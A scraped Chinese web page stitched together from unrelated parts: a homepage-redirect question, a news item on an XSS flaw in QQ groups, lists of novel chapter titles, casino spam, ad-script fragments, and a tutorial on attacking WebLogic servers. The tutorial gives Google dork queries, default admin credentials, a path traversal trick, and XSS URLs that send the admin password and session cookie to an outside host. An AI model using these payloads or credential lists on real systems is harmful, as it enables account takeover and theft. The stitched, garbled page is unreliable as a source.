被别的打开网站跳转百度首页攻击,首页强制跳转到另外打开网站跳转百度首页去了,怎么解决,求详情

来源:蜘蛛抓取(WebSpider) 时间:2016-04-17 06:16 标签: nginx 首页跳转
你的位置: >
> 腾讯QQ群现XSS攻击漏洞,强制用户页面跳转
QQ群漏洞,会被强制跳转、挂马,怎么样,怕了吧?
6月11日消息,今日腾讯QQ群在漏洞报告网站被爆存在XSS攻击漏洞,可执行js,使用户被强制跳转页面、弹窗甚至被诱导挂马泄漏个人信息。
据了解,XXS又叫CSS(Cross Site Script) ,意为跨站脚本攻击。恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意攻击用户的特殊目的。
业内人士表示,因此漏洞可借助各类网站地址在QQ群进行大肆传播,一旦被利用将会盗取大量用户的Cookie,使得用户个人信息被泄漏。而现在已经有人在利用此漏洞进行信息盗取。
截至发稿,腾讯官方仍未有官方回应,漏洞状态依然为“等待厂商处理”。
转载请注明: &
与本文相关的文章食在广州书网
食在广州书网
[]-算计(万更)
[]-番外43:阡陌上桑26(5000+)
[]-被他抱得喘不过气来(10000字)
[]-130男色皆补药(5)
[]-第四十八章 丢丢卖棉花3
[]-【010】快走为妙
[]-第93章 九婴大蛇
[]-第八十章 雪中送炭
[]-第24章 小呆呆的秋景
[]-第17章 :英国的生活(二)
[]-第16章 ,药帝,归来!
[]-第50章 收服邪祟
[]-第4章 :出手相助(收藏)
[]-第20章 追杀
[]-第4章 初见花千骨
[]-第一百零八章 无语的分手
[]-第一百四十三章 大婚之前
[]-《新城》创作手札(不是正文可以不订阅)
《小说排行》
[]-598.第598章 面目全非 惨不忍睹
[]-第63章 忠心的手下
[]-第144章 细柳城
[]-第33章 遇险
[]-第421章差点被毁的狗生幸福
[]-第521章不想,会听话
[]-第179章硬骨头(15爆)/24
[]-第991章,明明抱着,却哭着醒了
[]-第398章 一切为了仙子
[]-第450章太危险了
《刚刚更新的小说》
[]-第七十八章 教官的归去来兮(五)08:00
[]-第七十章 家传渊源08:00
[]-第312章 闲庭坐唱空城计(22)08:00
[]-第104章 为什么就不能够接受我的爱呢?08:00
[]-第770章 小.姨子08:00
[]-第六百章 有缘,再会08:00
[]-第333章 恐怖射手榜08:00
[]-第61章 :两年后08:00
[]-第69章 妈妈08:00
[]-第二百九十五章 鞍山大空降08:00
[]-第163章 163玉魂08:00
[]-第1250章 你们这是找死!08:00
[]-第1239章 一块钱看病08:00
[]-第212章 不是一伙人08:00
[]-第271章 后门啊后门08:00
[]-第十七章 这个怪盗是个女的08:00
[]-第六十章 强力整合08:00
[]-算计(万更)08:00
[]-第三百三十八章 绝不撤资!08:00
[]-第七十二章 绝对的把握08:00
[]-第93章 乌鹊南飞08:00
[]-番外43:阡陌上桑26(5000+)08:00
[]-第四十二章 飞马牧场08:00
[]-第一百章 【就赌那一线希望】08:00
[]-第二卷第九十四章陨落前的托付08:00
[]-第七十一章 马小雨她爹08:00
[]-第二百七十四章:环套环08:00
[]-第四百五十五章 奇怪的聚餐08:00
[]-第四百零九章 成果鉴定08:00
[]-被他抱得喘不过气来(10000字)08:00
[]-各怀心事08:00
[]-130男色皆补药(5)08:00
[]-第三百二十章【虚幻梦境】08:00
[]-情敌见面08:00
[]-第九十六章 悲催的属性08:00
[]-第三百五十一章 女人吃相不能这么难看08:00
[]-111.七级浮屠08:00
[]-第四十八章 丢丢卖棉花308:00
[]-第一百三十章 假面超人杀人事件(一)08:00
[]-第30章 柔情万千08:00
[]-第464章 手机里不停的播放着那一首父亲08:00
[]-第一百九十一章 改朝换代08:00
[]-【010】快走为妙08:00
[]-第93章 九婴大蛇08:00
[]-第4章08:00
[]-第170章08:00
[]-第八十章 雪中送炭08:00
[]-第24章 小呆呆的秋景08:00
[]-第84章 南京城08:00
[]-第17章 :英国的生活(二)08:00
[]-第79章 跑路08:00
[]-第334章08:00
[]-320:闻风丧胆的军队08:00
[]-第545章 实力碾压08:00
[]-第731章 要不要这么奇葩08:00
[]-第699章 现场诊治08:00
所有小说均由书友上传且不做任何商业用途,仅为书友提供一个分享与交流的平台。且为非赢利性站点。如果部分小说涉嫌色情、暴力等违法内容,或者是侵犯了作者您的合法权益,请!Copyright &2015&&114网址导航澳门美高梅,澳门赌场金沙 - 澳门葡京美女
请选择分享的版块Web安全实践(10)攻击weblogic
&这次是我花了两个多小时的时间做的一个小实验,只检测了一个网站,并没有系统的去对WebLogic做整体的安全性分析。破砖引玉吧。
一、寻找WebLogic的方法
(1)使用我们前面介绍的平台识别方法来识别是否是WebLogic Server。
(2)Google搜索
关键字&WebLogic Server inurl:console&,URL后面是console结尾的,一般为WebLogic Serve管理后台入口。
如果没有进入管理界面,我们可以采用在找到的目标URL后面加上console的方法,回车就会自动跳转到管理登录页面。
猜测一下管理界面的路径,如login/LoginForm.jsp。
我们也可以采用爬行程序,下载网站目录,这样很容易判断出登录界面的具体位置。
(1)测试默认密码
默认的缺省密码有以下几组:
1、用户名密码均为:weblogic
2、用户名密码均为:system
3、用户名密码均为:portaladmin
4、用户名密码均为:guest
如果尝试完了都不能登录,可以交叉换用用户名和密码,比如用户名为weblogic,密码为system,这个可以自己灵活变通,当然也可以做个字典文件暴破。不过我测试了半天也没好用。
(2)验证url输入
Bea weblogic在Windows平台下的版本存在一个安全,攻击者可以在一个URL后面
增加一些特殊的编码字符(例如%00,%2e,%2f或%5c),可能导致绕过缺省浏览文档(例如,index.html)的限制,从而得到web目录的内容列表。
例如我在下面这个网址输入//../
跳转到了首页。说明网站没有对url输入做过滤。
(3)查看表单
查看客户端源文件的时候这个信息引起了我的注意:
传送用户名和密码的表单分别为j_uername和j_password。经过测试存在跨站脚本漏洞。
BEA WebLogic管理控制台登陆页面的j_username和j_password参数中存在跨站脚本漏洞,攻击者可以诱骗合法的Web应用程序向没有戒备的终端用户发送恶意代码,通常是通过创建嵌入了恶意脚本代码的超级链接。有效用户很可能会点击这个链接,因为它看起来好像指向可信任域中的资源。如果用户点击了这个链接的话就可以执行攻击者所提供的代码,导致窃取管理员的会话cookie。
类似下面给的语句成功的执行了。
窃取管理员口令
http://dd/console/login/LoginForm.?j_password=&&onBlur=&window.open('http://xuanhun/'%2Bdocument.all.j_password.value)&
窃取会话cookie&
http://dd/console/login/LoginForm.jsp?j_password=&&onBlur=&window.open('http://xuanhun/'%2Bdocument.cookie)&
(window.slotbydup=window.slotbydup || []).push({
id: '2467140',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467141',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467142',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467143',
container: s,
size: '1000,90',
display: 'inlay-fix'
(window.slotbydup=window.slotbydup || []).push({
id: '2467148',
container: s,
size: '1000,90',
display: 'inlay-fix'

我要回帖

更多关于 nginx 首页跳转 的文章

 

随机推荐